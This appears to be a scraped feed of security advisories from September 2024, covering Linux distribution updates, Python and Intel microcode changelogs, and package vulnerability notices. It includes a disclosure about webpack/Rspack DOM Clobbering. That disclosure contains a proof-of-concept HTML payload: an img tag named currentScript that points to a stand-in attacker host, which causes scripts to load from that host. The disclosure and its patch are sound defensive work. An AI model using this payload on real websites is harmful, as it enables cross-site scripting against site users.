gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. That's CVE-2024-6923.
gh-119690: Fixes data type confusion in audit events raised by _winapi.CreateFile and _winapi.CreateNamedPipe.
gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still has pending operation at deallocation, the process may crash.
gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at fork is now fixed.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ae2925c3ae
20.09.2024 03:16:10fedora[FEDORA-2024-acb9425c93] Fedora 41: iwd, libell, bluez (high)
libell 0.69:
Add support for getting remaining microseconds left on a timer.
Add support for setting link MTU on a network interface.
iwd 2.21:
Fix issue with pending scan requests after regdom update.
Fix issue with handling the rearming of the roaming timeout.
Fix issue with survey request and externally triggered scans.
Fix issue with RSSI fallback when setting CQM threshold fails.
Fix issue with FT-over-Air without offchannel support.
Add support for per station Affinities property.
bluez 5.78:
Fix issue with handling notification of scanned BISes to BASS.
Fix issue with handling checking BIS caps against peer caps.
Fix issue with handling MGMT Set Device Flags overwrites.
Fix issue with handling ASE notification order.
Fix issue with handling BIG Info report events.
Fix issue with handling PACS Server role.
Fix issue with registering UHID_START multiple times.
Fix issue with pairing method not setting auto-connect.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-acb9425c93
19.09.2024 22:42:32ubuntu[USN-6968-2] PostgreSQL vulnerabilityPostgreSQL could execute arbitrary SQL functions as the superuser if it received a specially crafted SQL object.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6968-2
19.09.2024 21:33:23suse[SUSE-SU-2024:3349-1] Security update for the Linux Kernel (Live Patch 13 for SLE 15 SP5) (important)Security update for the Linux Kernel (Live Patch 13 for SLE 15 SP5)https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3349-1
20.09.2024 00:34:31maven[MAVEN:GHSA-4XX7-2CX3-X473] Keycloak SAML signature validation flaw (high)A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4XX7-2CX3-X473
20.09.2024 00:34:31maven[MAVEN:GHSA-VVF8-2H68-9475] Keycloak Open Redirect vulnerability (moderate)A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VVF8-2H68-9475
19.09.2024 21:03:56suse[SUSE-SU-2024:3348-1] Security update for the Linux Kernel (Live Patch 12 for SLE 15 SP5) (important)Security update for the Linux Kernel (Live Patch 12 for SLE 15 SP5)https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3348-1
19.09.2024 21:03:39suse[SUSE-SU-2024:3347-1] Security update for the Linux Kernel (Live Patch 11 for SLE 15 SP5) (important)Security update for the Linux Kernel (Live Patch 11 for SLE 15 SP5)https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3347-1
19.09.2024 20:36:42ubuntu[USN-7015-2] Python vulnerabilitiesSeveral security issues were fixed in Python.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7015-2
19.09.2024 20:30:06npm[NPM:GHSA-84JW-G43V-8GJM] DOM Clobbering Gadget found in Rspack's AutoPublicPathRuntimeModule that leads to XSS (moderate)
Hi, Rspack|Webpack developer team!

## Summary

We discovered a DOM Clobbering vulnerability in Webpack's AutoPublicPathRuntimeModule. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

We found a real-world exploitation of this gadget in the Canvas LMS, where an XSS attack happens through JavaScript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack's code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.

## Details

### Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markup in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of JS code) living in the existing JavaScript code to transform it into executable code. For more information about DOM Clobbering, here are some references:

[1] [scnps.co/papers/sp23_domclob.pdf](https://scnps.co/papers/sp23_domclob.pdf)
[2] [research.securitum.com/xss-in-amp4email-dom-clobbering](https://research.securitum.com/xss-in-amp4email-dom-clobbering/)

### Gadgets found in Webpack | Rspack

We identified a DOM Clobbering vulnerability in Webpack's AutoPublicPathRuntimeModule. When the output.publicPath field in the configuration is not set or is set to auto, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:

```js
/******/ /* webpack/runtime/publicPath */
/******/ (() => {
/******/ var scriptUrl;
/******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ var document = __webpack_require__.g.document;
/******/ if (!scriptUrl && document) {
/******/ if (document.currentScript)
/******/ scriptUrl = document.currentScript.src;
/******/ if (!scriptUrl) {
/******/ var scripts = document.getElementsByTagName("script");
/******/ if(scripts.length) {
/******/ var i = scripts.length - 1;
/******/ while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ }
/******/ }
/******/ }
/******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ __webpack_require__.p = scriptUrl;
/******/ })();
```

However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with document.currentScript can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the src attribute of the attacker-controlled element will be used as the scriptUrl and assigned to __webpack_require__.p. If additional scripts are loaded from the server, __webpack_require__.p will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.

## PoC

Please note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I'm providing a demo to illustrate the concept.

Consider a website developer with the following two scripts, entry.js and import1.js, that are compiled using Webpack:

```js
// entry.js
import('./import1.js')
  .then(module => { module.hello(); })
  .catch(err => { console.error('Failed to load module', err); });
```

```js
// import1.js
export function hello () {
  console.log('Hello');
}
```

The webpack.config.js is set up as follows:

```js
const path = require('path');
module.exports = {
  entry: './entry.js', // Ensure the correct path to your entry file
  output: {
    filename: 'webpack-gadgets.bundle.js', // Output bundle file
    path: path.resolve(__dirname, 'dist'), // Output directory
    publicPath: "auto", // Or leave this field not set
  },
  target: 'web',
  mode: 'development',
};
```

When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the import1.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

```html
<!DOCTYPE html>
<html>
<head>
  <title>Webpack Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts -->
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends -->
</head>
<script src="./dist/webpack-gadgets.bundle.js"></script>
<body></body>
</html>
```

## Impact

This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.

## Patch

A possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: [google/closure-library@b312823/closure/goog/base.js#L174](https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174)

```js
/******/ /* webpack/runtime/publicPath */
/******/ (() => {
/******/ var scriptUrl;
/******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ var document = __webpack_require__.g.document;
/******/ if (!scriptUrl && document) {
/******/ if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :>
/******/ scriptUrl = document.currentScript.src;
/******/ if (!scriptUrl) {
/******/ var scripts = document.getElementsByTagName("script");
/******/ if(scripts.length) {
/******/ var i = scripts.length - 1;
/******/ while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ }
/******/ }
/******/ }
/******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ __webpack_require__.p = scriptUrl;
/******/ })();
```

Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-84JW-G43V-8GJM
19.09.2024 20:16:05ubuntu[USN-7027-1] Emacs vulnerabilitiesSeveral security issues were fixed in Emacs.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7027-1
19.09.2024 19:11:22ubuntu[USN-7024-1] tgt vulnerabilitytgt could be made to generate identical sequence of challenges.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7024-1
19.09.2024 19:06:06maven[MAVEN:GHSA-735F-PC8J-V9W8] protobuf-java has potential Denial of Service issue (high)
### Summary

When parsing unknown fields in the Protobuf Java Lite and Full library, a maliciously crafted message can cause a StackOverflow error and lead to a program crash.

Reporter: Alexis Challande, Trail of Bits Ecosystem Security Team <ecosystem@trailofbits.com>

Affected versions: This issue affects all versions of both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.

### Severity

[CVE-2024-7254](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7254) **High** CVSS4.0 Score 8.7 (NOTE: there may be a delay in publication)

This is a potential Denial of Service. Parsing nested groups as unknown fields with DiscardUnknownFieldsParser or Java Protobuf Lite parser, or against Protobuf map fields, creates unbounded recursions that can be abused by an attacker.

### Proof of Concept

For reproduction details, please refer to the unit tests (Protobuf Java [LiteTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/lite/src/test/java/com/google/protobuf/LiteTest.java) and [CodedInputStreamTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/core/src/test/java/com/google/protobuf/CodedInputStreamTest.java)) that identify the specific inputs that exercise this parsing weakness.

### Remediation and Mitigation

We have been working diligently to address this issue and have released a mitigation that is available now. Please update to the latest available versions of the following packages:

* protobuf-java (3.25.5, 4.27.5, 4.28.2)
* protobuf-javalite (3.25.5, 4.27.5, 4.28.2)
* protobuf-kotlin (3.25.5, 4.27.5, 4.28.2)
* protobuf-kotlin-lite (3.25.5, 4.27.5, 4.28.2)
* com-protobuf [JRuby gem only] (3.25.5, 4.27.5, 4.28.2)
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-735F-PC8J-V9W8
19.09.2024 18:11:27suse[SUSE-SU-2024:3345-1] Security update for python-azure-identity (moderate)Security update for python-azure-identityhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3345-1
19.09.2024 17:51:59suse[SUSE-SU-2024:3344-1] Security update for kubernetes1.25 (important)Security update for kubernetes1.25https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3344-1
19.09.2024 17:51:26suse[SUSE-SU-2024:3343-1] Security update for kubernetes1.24 (important)Security update for kubernetes1.24https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3343-1
19.09.2024 17:51:06suse[SUSE-SU-2024:3342-1] Security update for kubernetes1.24 (important)Security update for kubernetes1.24https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3342-1
19.09.2024 17:50:41suse[SUSE-SU-2024:3341-1] Security update for kubernetes1.23 (important)Security update for kubernetes1.23https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3341-1
19.09.2024 17:49:42maven[MAVEN:GHSA-68J8-FP38-P48Q] Gematik Referenzvalidator has an XXE vulnerability that can lead to a Server Side Request Forgery attack (high)
### Impact

The profile location routine in the referencevalidator commons package is vulnerable to [XML External Entities](https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)) attack due to insecure defaults of the used Woodstox WstxInputFactory. A malicious XML resource can lead to network requests issued by referencevalidator and thus to a [Server Side Request Forgery](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery) attack.

The vulnerability impacts applications which use referencevalidator to process XML resources from untrusted sources.

### Patches

The problem has been patched with the [2.5.1 version](https://github.com/gematik/app-referencevalidator/releases/tag/2.5.1) of the referencevalidator. Users are strongly recommended to update to this version or a more recent one.

### Workarounds

A pre-processing or manual analysis of input XML resources on existence of DTD definitions or external entities can mitigate the problem.

### References

- [OWASP Top 10 XXE](https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)#)
- [Server Side Request Forgery](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery)
- [OWASP XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory)
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-68J8-FP38-P48Q
19.09.2024 17:49:20maven[MAVEN:GHSA-C459-2M73-67HJ] SOFA Hessian Remote Command Execution (RCE) Vulnerability (high)
### Impact

SOFA Hessian protocol uses a blacklist mechanism to restrict deserialization of potentially dangerous classes for security protection. But there is a gadget chain that can bypass the SOFA Hessian blacklist protection mechanism, and this gadget chain only relies on the JDK and does not rely on any third-party components.

### Patches

Fixed this issue by updating the blacklist; users can upgrade to sofahessian version 3.5.5 to avoid this issue.

### Workarounds

You can maintain a blacklist yourself in this directory `external/serialize.blacklist`.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C459-2M73-67HJ
19.09.2024 17:32:08suse[SUSE-SU-2024:3339-1] Security update for libmfx (moderate)Security update for libmfxhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3339-1
19.09.2024 17:32:01suse[SUSE-SU-2024:3338-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3338-1
19.09.2024 17:30:41suse[SUSE-SU-2024:3337-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3337-1
19.09.2024 16:33:31suse[SUSE-SU-2024:3336-1] Security update for the Linux Kernel RT (Live Patch 13 for SLE 15 SP5) (important)Security update for the Linux Kernel RT (Live Patch 13 for SLE 15 SP5)https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3336-1
19.09.2024 16:03:59suse[SUSE-SU-2024:3334-1] Security update for the Linux Kernel RT (Live Patch 14 for SLE 15 SP5) (important)Security update for the Linux Kernel RT (Live Patch 14 for SLE 15 SP5)https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3334-1
19.09.2024 15:28:13ubuntu[USN-7025-1] LibreOffice vulnerability (high)LibreOffice could accept fraudulent digital signatures.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7025-1
19.09.2024 14:47:13cert[VU:138043] A stack-based overflow vulnerability exists in the Microchip Advanced Software Framework (ASF) implementation of the tinydhcp server (critical)
### Overview

A stack-based overflow vulnerability exists in the tinydhcp server in the Microchip Advanced Software Framework (ASF) that can lead to remote code execution.

### Description

An implementation of DHCP in ASF fails input validation, thereby creating conditions for a stack-based overflow. The software is no longer supported by the vendor. Because this vulnerability is in IoT-centric code, it is likely to surface in many places in the wild.

**CVE-2024-7490**

There exists a vulnerability in all publicly available examples of the ASF codebase that allows for a specially crafted DHCP request to cause a stack-based overflow that could lead to remote code execution.

### Impact

This vulnerability can be tested by sending a single DHCP Request packet to a multicast address. This vulnerability exists in the current version of ASF 3.52.0.2574 and all previous versions of the software. There are also multiple forks of the tinydhcp software in github that are also potentially susceptible to this vulnerability.

### Solution

The CERT/CC is currently unaware of a practical solution to this problem other than replacing the tinydhcp service with another one that does not have the same issue.

### Acknowledgements

Thanks to the reporter Andrue Coombes of Amazon Element55. This document was written by Timur Snoke.
https://secdb.nttzen.cloud/security-advisory/cert/VU:138043
19.09.2024 12:11:49suse[SUSE-SU-2024:3333-1] Security update for wireshark (moderate)Security update for wiresharkhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3333-1
19.09.2024 12:11:19suse[SUSE-SU-2024:3332-1] Security update for ucode-intel (moderate)Security update for ucode-intelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3332-1
19.09.2024 09:52:10suse[SUSE-SU-2024:3324-1] Security update for runc (low)Security update for runchttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3324-1
19.09.2024 09:52:02suse[SUSE-SU-2024:3323-1] Security update for wireshark (moderate)Security update for wiresharkhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3323-1
19.09.2024 06:56:46ubuntu[USN-7023-1] Git vulnerabilities (critical)Several security issues were fixed in Git.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7023-1
19.09.2024 05:31:53fedora[FEDORA-2024-1b36a483cc] Fedora 40: frr (high)Fix for CVE-2024-44070https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1b36a483cc
19.09.2024 05:31:46fedora[FEDORA-2024-146ef211bc] Fedora 40: ruby (medium)Upgrade to Ruby 3.3.5.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-146ef211bc
19.09.2024 04:59:16fedora[FEDORA-2024-1d4155bd39] Fedora 39: microcode_ctl (medium)
Update to upstream 2.1-45. 20240910
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode from revision 0x35 up to 0x36;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;
Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;
Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode from revision 0x35 up to 0x36;
Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;
Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;
Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode from revision 0x433 up to 0x434;
Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode (in intel-ucode/06-9a-03) from revision 0x433 up to 0x434;
Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode (in intel-ucode/06-9a-04) from revision 0x433 up to 0x434;
Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode from revision 0x433 up to 0x434;
Update of 06-aa-04/0xe6 (MTL-H/U C0) microcode from revision 0x1e up to 0x1f;
Update of 06-b7-01/0x32 (RPL-S B0) microcode from revision 0x123 up to 0x129;
Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode from revision 0x4121 up to 0x4122;
Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-02) from revision 0x4121 up to 0x4122;
Update of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-02) from revision 0x4121 up to 0x4122;
Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-03) from revision 0x4121 up to 0x4122;
Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode from revision 0x4121 up to 0x4122;
Update of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-03) from revision 0x4121 up to 0x4122;
Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-08) from revision 0x4121 up to 0x4122;
Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-08) from revision 0x4121 up to 0x4122;
Update of 06-ba-08/0xe0 microcode from revision 0x4121 up to 0x4122;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;
Update of 06-bf-02/0x07 (ADL C0) microcode from revision 0x35 up to 0x36;
Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;
Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;
Update of 06-bf-05/0x07 (ADL C0) microcode from revision 0x35 up to 0x36;
Update of 06-be-00/0x19 (ADL-N A0) microcode from revision 0x17 up to 0x1a (old pf 0x11).
Addresses CVE-2024-23984, CVE-2024-24968
Added the documentation directory to the list of files owned by the package
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1d4155bd39
19.09.2024 04:59:13 | fedora | [FEDORA-2024-7dc0f381f1] Fedora 39: python3.6 (high)
Security fix for CVE-2024-6232 (rhbz#2310092)
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7dc0f381f1

19.09.2024 04:59:12 | fedora | [FEDORA-2024-39d459dd00] Fedora 39: python3.10 (high)
This is a security release of Python 3.10

Note: The release you're looking at is Python 3.10.15, a security bugfix release for the legacy 3.10 series. Python 3.12 is now the latest feature release series of Python 3.

Security content in this release

gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. That's CVE-2024-6923.
gh-119690: Fixes data type confusion in audit events raised by _winapi.CreateFile and _winapi.CreateNamedPipe.
gh-116773: Fix instances of "<_overlapped.Overlapped object at 0xXXX> still has pending operation at deallocation, the process may crash".
gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at fork is now fixed.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-39d459dd00

19.09.2024 03:18:37 | fedora | [FEDORA-2024-d6726b5d75] Fedora 41: microcode_ctl (medium)
Update to upstream 2.1-45. 20240910
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode from revision 0x35 up to 0x36;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;
Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;
Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode from revision 0x35 up to 0x36;
Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;
Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;
Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode from revision 0x433 up to 0x434;
Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode (in intel-ucode/06-9a-03) from revision 0x433 up to 0x434;
Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode (in intel-ucode/06-9a-04) from revision 0x433 up to 0x434;
Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode from revision 0x433 up to 0x434;
Update of 06-aa-04/0xe6 (MTL-H/U C0) microcode from revision 0x1e up to 0x1f;
Update of 06-b7-01/0x32 (RPL-S B0) microcode from revision 0x123 up to 0x129;
Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode from revision 0x4121 up to 0x4122;
Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-02) from revision 0x4121 up to 0x4122;
Update of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-02) from revision 0x4121 up to 0x4122;
Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-03) from revision 0x4121 up to 0x4122;
Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode from revision 0x4121 up to 0x4122;
Update of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-03) from revision 0x4121 up to 0x4122;
Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-08) from revision 0x4121 up to 0x4122;
Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-08) from revision 0x4121 up to 0x4122;
Update of 06-ba-08/0xe0 microcode from revision 0x4121 up to 0x4122;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;
Update of 06-bf-02/0x07 (ADL C0) microcode from revision 0x35 up to 0x36;
Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;
Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;
Update of 06-bf-05/0x07 (ADL C0) microcode from revision 0x35 up to 0x36;
Update of 06-be-00/0x19 (ADL-N A0) microcode from revision 0x17 up to 0x1a (old pf 0x11).
Addresses CVE-2024-23984, CVE-2024-24968
Added the documentation directory to the list of files owned by the package
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d6726b5d75

19.09.2024 03:18:32 | fedora | [FEDORA-2024-6def755315] Fedora 41: python3.12 (high)
This is the sixth maintenance release of Python 3.12

Python 3.12 is the newest major release of the Python programming language, and it contains many new features and optimizations. 3.12.6 is the latest maintenance release, containing about 90 bugfixes, build improvements and documentation changes since 3.12.5. This is an expedited release to address the following security issues:

gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
